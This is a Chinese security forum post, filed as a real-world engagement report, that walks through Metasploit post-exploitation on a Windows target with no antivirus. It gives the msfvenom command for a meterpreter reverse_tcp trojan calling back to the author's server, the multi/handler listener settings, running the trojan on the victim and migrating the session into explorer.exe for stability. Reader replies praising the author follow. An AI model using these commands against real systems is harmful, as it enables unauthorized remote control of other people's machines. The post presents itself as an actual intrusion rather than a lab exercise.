打瞌睡的状况下写的无质量msf内网

小熊保安   ·   发表于 2021-09-27 19:34:06   ·   实战纪实

本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀.

一、MSF生成木马上线目标

0x01. 生成木马

使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f exe > exp.exe 创建一个msf的木马(不免杀版本)

其中 -p 后面的内容是使用的 payload类型,LHOST是vps的地址,LPORT是端口

0x02. 监听端口

命令: use exploit/multi/handler 使用msf的监听模块

设置payload: set payload windows/x64/meterpreter/reverse_tcp 这里和生成木马的时候写的payload要一样,否则会链接不上,如下图

设置监听地址以及端口:

set lhost xxx.xxx.xxx.xxx

set lport 4444

设置好了之后 直接run 监听起来。

0x03. 弹回Meterpreter会话

将生成的msf的木马上传到目标服务器上,然后直接运行

运行之后,vps的msf会收到一个弹回的meterpreter会话

0x04. 进程迁移

为了会话的稳定性,将meterpreter shell迁移到其他不易被关闭进程上,通常是explorer.exe(文件资源管理器)

手动迁移进程命令:migrate -N ProcessName 或者 migrate PID

用户名金币积分时间理由
2768905967 416.80 0 2023-10-27 00:12:16 小熊保安哥哥521
Track-手电筒 80.00 0 2021-09-29 21:09:42 一个受益终生的帖子~~

打赏我,让我更有动力~

4 条回复   |  直到 2023-10-27 | 1014 次浏览

山屿云
发表于 2021-9-29

强啊师傅

评论列表

  • 加载数据中...

编写评论内容

test_707
发表于 2021-9-30

好文,渗透大师,666

评论列表

  • 加载数据中...

编写评论内容

spider
发表于 2021-9-30

早就说过了 保安一直在扮猪吃老虎

评论列表

  • 加载数据中...

编写评论内容

2768905967
发表于 2023-10-27

强啊师傅

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.